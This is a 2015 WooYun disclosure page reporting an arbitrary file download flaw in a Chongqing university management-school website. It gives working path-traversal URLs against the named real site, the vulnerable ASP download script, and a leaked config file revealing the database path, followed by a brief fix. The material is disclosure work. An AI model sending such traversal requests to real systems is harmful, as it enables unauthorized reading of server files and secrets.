当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0110672
漏洞标题:
重庆某大学管理学院任意文件下载漏洞
相关厂商:
西南政法大学
漏洞作者:
hans_1990
提交时间:
2015-05-07 17:01
修复时间:
2015-05-12 17:02
公开时间:
2015-05-12 17:02
漏洞类型:
任意文件遍历/下载
危害等级:
自评Rank:
5
漏洞状态:
已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-05-07: 细节已通知厂商并且等待厂商处理中
2015-05-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

重庆某大学管理学院任意文件下载漏洞,可获得敏感信息

详细说明:

http://www.swupl.edu.cn/guanli

QQ截图20150427155453.jpg


http://www.swupl.edu.cn/guanli/cpseditor/editor/filemanage/download.asp?filename=./../../guanli/cpseditor/editor/filemanage/download.asp 

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<!--#include file="../common/asp/config.asp" -->
<!--#include file="../common/asp/adovbs.inc" -->
<!--#include file="../../cpsconfig.asp" -->
<%
Dim strDownLoadFileName
Dim strDownLoadFilePath
strDownLoadFileName = Request("filename")
Dim strCurrentPage
strCurrentPage = Request.ServerVariables("SCRIPT_NAME")
'当前是/cpseditor/editor/filemanage/download.asp
Dim strRootURL
strRootURL = Left(strCurrentPage, InstrRev(strCurrentPage, "cpseditor/editor/filemanage/download.asp") - 1)
strDownLoadFilePath = Server.MapPath(strRootURL & CPSConfig_uploadFilesPath & strDownLoadFileName)
Dim objFSO
Dim objFile
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objFile = ObjFSO.GetFile(strDownLoadFilePath)
Dim intFileSize
intFileSize = objFile.Size
Set objFile = Nothing
Set objFSO = Nothing
Dim objStream
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = adTypeBinary
objStream.LoadFromFile strDownLoadFilePath
'Dim ExtendName
'Dim LastPoint
'LastPoint = InstrRev(ShortFileName, ".")
'ExtendName = LCase(Mid(ShortFileName, LastPoint + 1))
''ExtendName = "." & ExtendName
'ContentType = GetContentType(ExtendName)
Response.AddHeader "Content-Disposition", "attachment; filename=" & strDownLoadFileName
Response.AddHeader "Content-Length", intFileSize
Response.Charset = "UTF-8"
Response.ContentType = "application/unknown"
'Response.ContentType = "application/octet-stream"
Response.BinaryWrite objStream.Read
Response.Flush
Response.Clear
objStream.Close
Set objStream = Nothing
%>


漏洞证明:

http://www.swupl.edu.cn/guanli/cpseditor/editor/filemanage/download.asp?filename=./../../guanli/./common/consts.asp

<%
Const MESSAGE_UPLOADFILE_SUCCESS = "文件上传成功!" 
Const MESSAGE_UPLOADFILE_OVERFLOW = "您选择的文件超出系统允许的大小!"
Const config_databasePath = "data/data.mdb"
Const config_loginSession = "School of Management, Website System Manager"
Const config_connectionString = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="
Dim config_maxUploadSize
config_maxUploadSize = 2097152  '2 * (1024 ^ 2) 文件上传最大的大小为2M
%>


这是数据库链接文件存在敏感信息

修复方案:

过滤../过滤文件名
访问权限限制未经认证的跨目录访问

版权声明:转载请注明来源 hans_1990@乌云

>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-12 17:02

厂商回复:

最新状态:

暂无